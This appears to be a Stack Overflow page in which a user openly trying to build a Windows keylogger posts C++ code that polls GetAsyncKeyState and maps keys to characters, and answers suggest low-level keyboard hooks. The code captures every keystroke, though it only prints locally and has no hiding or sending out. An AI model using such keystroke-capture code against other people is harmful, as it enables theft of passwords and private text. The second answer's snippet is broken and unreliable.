# GetAsyncKeyState() don't work with 'OEM' keys

Tags: c++, winapi, keylogger

I'm trying to create a keylogger. I decided to use the function GetAsyncKeyState. I programmed all of keys. And when I was testing my keylogger, I realized that keys like ,<.>/?;:'"[{]}\|=+-_ aren't displaying on the console. Why?

This is my code:

```
#include <iostream>
#include <Windows.h>
#include <string>
#include <cctype>
#include <conio.h>

using namespace std;

string WhichKey(char key)
{
string ToReturn;

switch (key)
{
case VK_BACK:
    return "*BACKSPACE*";
case VK_TAB:
    return "*TAB*";
case VK_RETURN:
    return "*ENTER*";
case VK_SHIFT:
    return "*SHIFT*";
case VK_MENU:
    return "*ALT*";
case VK_CONTROL:
    return "*CTRL*";
case VK_ESCAPE:
    return "*ESC*";
case VK_SPACE:
    return " ";
case VK_PRIOR:
    return "*PAGE_UP*";
case VK_NEXT:
    return "*PAGE_DOWN*";
case VK_END:
    return "*END*";
case VK_HOME:
    return "*HOME*";
case VK_CAPITAL:
    return "*CAPS_LOCK*";
case VK_UP:
    return "*UP_ARROW*";
case VK_DOWN:
    return "*DOWN_ARROW*";
case VK_LEFT:
    return "*LEFT_ARROW*";
case VK_RIGHT:
    return "*RIGHT_ARROW*";
case VK_EXECUTE:
    return "*EXECUTE*";
case VK_SNAPSHOT:
    return "*PRINTSCREEN*";
case VK_INSERT:
    return "*INSERT*";
case VK_DELETE:
    return "*DELETE*";
case VK_LWIN:
case VK_RWIN:
    return "*WIN*";
case VK_NUMPAD0:
    return "0";
case VK_NUMPAD1:
    return "1";
case VK_NUMPAD2:
    return "2";
case VK_NUMPAD3:
    return "3";
case VK_NUMPAD4:
    return "4";
case VK_NUMPAD5:
    return "5";
case VK_NUMPAD6:
    return "6";
case VK_NUMPAD7:
    return "7";
case VK_NUMPAD8:
    return "8";
case VK_NUMPAD9:
    return "9";
case VK_F1:
    return "*F1*";
case VK_F2:
    return "*F2*";
case VK_F3:
    return "*F3*";
case VK_F4:
    return "*F4*";
case VK_F5:
    return "*F5*";
case VK_F6:
    return "*F6*";
case VK_F7:
    return "*F7*";
case VK_F8:
    return "*F8*";
case VK_F9:
    return "*F9*";
case VK_F10:
    return "*F10*";
case VK_F11:
    return "*F11*";
case VK_F12:
    return "*F12*";
case VK_SCROLL:
    return "*SCROLL_LOCK*";
case VK_NUMLOCK:
    return "*NUM_LOCK*";
case VK_MULTIPLY:
    return "*";
case VK_ADD:
    return "+";
case VK_SUBTRACT:
    return "-";
case VK_DIVIDE:
    return "/";
case VK_DECIMAL:
    return ".";
case VK_LBUTTON:
    return "*left_click*";
case VK_RBUTTON:
    return "*right_click*";
case VK_MBUTTON:
    return "*middle_click*";
}

if (isalpha(key))
{
    if (!((GetKeyState(VK_CAPITAL) & 0x0001) == 0) ^ (((GetKeyState(VK_SHIFT) & 0x1000) == 0)))
    {
        key = tolower(key);                                                     //off
        ToReturn += key;
        return ToReturn;
    }
    else
    {
        ToReturn += key;                                                        //on
        return ToReturn;
    }
}
else if (isdigit(key))
{
    if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
    {
        ToReturn += key;                                                        //off
        return ToReturn;
    }
    else
    {
        switch (key)
        {
        case '1':
        {
            key = '!';
            break;
        }
        case '2':
        {
            key = '@';
            break;
        }
        case '3':
        {
            key = '#';
            break;
        }
        case '4':
        {
            key = '$';
            break;
        }
        case '5':
        {
            key = '%';
            break;
        }
        case '6':
        {
            key = '^';
            break;
        }
        case '7':
        {
            key = '&';
            break;
        }
        case '8':
        {
            key = '*';
            break;
        }
        case '9':
        {
            key = '(';
            break;
        }
        case '0':
        {
            key = ')';
            break;
        }

        }

        ToReturn += key;                                                        //on
        return ToReturn;
    }


}
else
{


    switch (key)
    {
    case VK_OEM_1:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = ';';                                                      //off
        else
            key = ':';
        break;
    }
    case VK_OEM_PLUS:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '=';                                                      //off
        else
            key = '+';
        break;
    }
    case VK_OEM_COMMA:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = ',';                                                      //off
        else
            key = '<';
        break;
    }
    case VK_OEM_MINUS:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '-';                                                      //off
        else
            key = '_';
        break;
    }
    case VK_OEM_PERIOD:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '.';                                                      //off
        else
            key = '>';
        break;
    }
    case VK_OEM_2:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '/';                                                      //off
        else
            key = '?';
        break;
    }
    case VK_OEM_3:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '`';                                                      //off
        else
            key = '~';
        break;
    }
    case VK_OEM_4:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '[';                                                      //off
        else
            key = '{';
        break;
    }
    case VK_OEM_5:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '\\';                                                     //off
        else
            key = '|';
        break;
    }
    case VK_OEM_6:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = ']';                                                      //off
        else
            key = '}';
        break;
    }
    case VK_OEM_7:
    {
        if ((GetKeyState(VK_SHIFT) & 0x1000) == 0)
            key = '\'';                                                     //off
        else
            key = '\"';
        break;
    }

    }



    ToReturn += key;
    return ToReturn;

}

ToReturn += key;                                                    
return ToReturn;
}

int main()
{

char key;

while(1) 
{ 
    for(key = 0; key <= 256; key++) 
    { 
        if (GetAsyncKeyState(key) & 0x0001)
        { 
                cout << WhichKey(key); 
        } 

    } 

} 


return 0;
}
```

Thanks in advance and sorry for my English.

Comment: They all require you to press shift right?

Comment: this can help you https://stackoverflow.com/questions/43724247/check-if-alt-key-is-pressed/43726477#43726477

Comment: You are mixing `GetKeyState()` and `GetAsyncKeyState()`. Knowing the difference between these two is essential.

Answer (score 0, accepted):

First off, this is a very naive approach to writing a keylogger. I actually tried this same thing the same way you are about 10 years ago.

A better approach would be to use Windows [Hooks](https://msdn.microsoft.com/en-us/library/windows/desktop/ms644990%28v=vs.85%29.aspx).

```
LRESULT CALLBACK llKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)
{
    KBDLLHOOKSTRUCT *hookStruct = (KBDLLHOOKSTRUCT*) lParam;

    // Parse the lParam value and members of the hookStruct structure

    return CallNextHookEx(0, nCode, wParam, lParam);
}

// Somewhere in your program, call the following function:
// Initialize the hook
SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC) llKeyboardHook, 0, 0);
```

The main idea here is to let Windows determine the resulting "output" character for you, instead of having to create a switch-case for each possibility like you have done.

I know this doesn't directly answer your question, but the approach you're taking is really the worst way to do it.

Comment: Thanks for answer, I will use Windows Hooks.

Comment: If someone is going to downvote my answer, I would appreciate at the very least an explanation of why you decided to downvote it.

Comment: A low-level keyboard hook intercepts keystrokes, not characters. The system doesn't determine the final character that gets sent to an application in a low-level keyboard hook. The OP is asking for characters. Your proposed solution has the very same shortcoming the OP is trying to solve. @Dbzdur: Please don't accept an answer that doesn't solve your problem.

Comment: @IInspectable On the contrary, low-level keyboard hooks contain a data structure that indicates the resulting character using a virtual key-code, which generally correspond to their ASCII value. If you're going to bother scrutinizing all of my answers, at least take the time to read the documentation before making false accusations. https://msdn.microsoft.com/en-us/library/windows/desktop/ms644967%28v=vs.85%29.aspx

Comment: Do `a` and `A` have different virtual-key codes? The OP needs to distinguish between uppercase and lowercase characters. And what would be the virtual-key code for the character `á`, or `_`, which the OP was explicitly asking for? No, I'm afraid, you haven't understood, how `WM_KEYDOWN` and `WM_CHAR` are completely different beasts. The latter is the one the OP is interested in, while your proposed solution provides the former only.

Comment: @IInspectable You're nit-picking here at something that's really a non-issue. Given a low-level keyboard hook, it's pretty trivial to keep track of the state of the Caps Lock and Shift keys. You also seem to miss the entire point of Stack Overflow with your commentary. The Windows API only provides certain facilities for developing keylogger-like functionality. Windows Hooks are the way to go without developing a driver. I pointed the OP in the right direction, I have no obligation to write a fully functional keylogger for him. It's up to him to learn for himself.

Comment: How is pointing out, that your proposed answer **completely** misses to address the OP's problem *"nit-picking"*? It may be pretty trivial to keep track of the Caps Lock key, or the Shift key. Combining both is more involved. Take dead-character keys into account, and your state machine gets complex already. Consider IME's, and the task will become near impossible. A hook *may* be part of a solution. But most definitely **not** a low-level keyboard hook. This answer is not useful. -1. You asked for an explanation, there you have it.

Comment: @IInspectable I can see that regardless of me explaining the intentions behind my answer, you remain very narrow-minded. I hope one day you realize that there is more than one way to solve a problem and that your opinion is not analogous to fact. It is people like you that drive others away from SE communities. Anyway, feel free to go through all of my answers (I see you've already started) and apply your insular point of view to them. I'm done with this conversation and I have better things to do with my time. Best of luck to you.

Comment: Given your low-level keyboard hook, how do you propose to intercept input of an underscore (`_`) character? Should be simple, right? Let's see it then. That's still far from *"a fully functional keylogger"*. If you cannot deliver even that tiny bit of information, then this is a strong indication, that, while there may be different solutions, this is not one of them.

Comment: @IInspectable Just to prove my point, I wrote a partially functional low-level keyboard hook that handles A-Z, a-z, 0-9, 0-9 secondary, plus, minus, underscore, tilde, comma, period, less-than, greater-than, forward slash, quesstion-mark, colon, semi-colon, equal sign, tick-mark, and the enter key. It is hastily written (so, a little sloppy and uncommented) and does not track the Caps Lock state or handle any other keypresses, simply because I feel I've made my point with what I've got here. https://pastebin.com/29MdUhHz

Comment: Isn't that odd, it fails for a number of characters for me, e.g. `=` or `)`. It is always an error to assume an environment you cannot enforce. Sorry, that one doesn't even suffice as a proof-of-concept. Unless you meant to proof, that your concept is wrong. Which this perfectly does.

Comment: @IInspectable *sigh* It's something I threw together in 20 minutes, I wasn't really focused on supporting different keyboard layouts or non-english characters. You asked me to intercept the input of an underscore character, that was what I was trying to prove. To provide support for different keyboard layouts and non-ascii characters, you'd need to determine regional settings. Having written my own OS kernel before, you work with keyboard scan codes. The low-level keyboard hook provides that as well, so it is entirely possible.

Comment: Oh of course, it's entirely possible. The OS does it already! You just picked the wrong hook and now try to re-implement, what the system already offers. In case you want to continue down that route of much dismay, it's not enough to look up regional settings. You're going to have to find out, whose thread's input you intercepted (entirely non-trivial by itself), and then check for that thread's regional settings. You'd need to do this for an underscore, too. Anyway, 2 down-votes, 0 up-votes. Did you not get the hint?

Answer (score 1):

try this, change the for loop variable `key` to int instead of char.

```
int key;

while (1) {
    for (key=8; key<= 255; key++) {
        if (i < 160 || i >165) {
            if (GetAsyncKeyState(i) == -32767) {
                <event>
            }
        }
    }
}

return 0;
```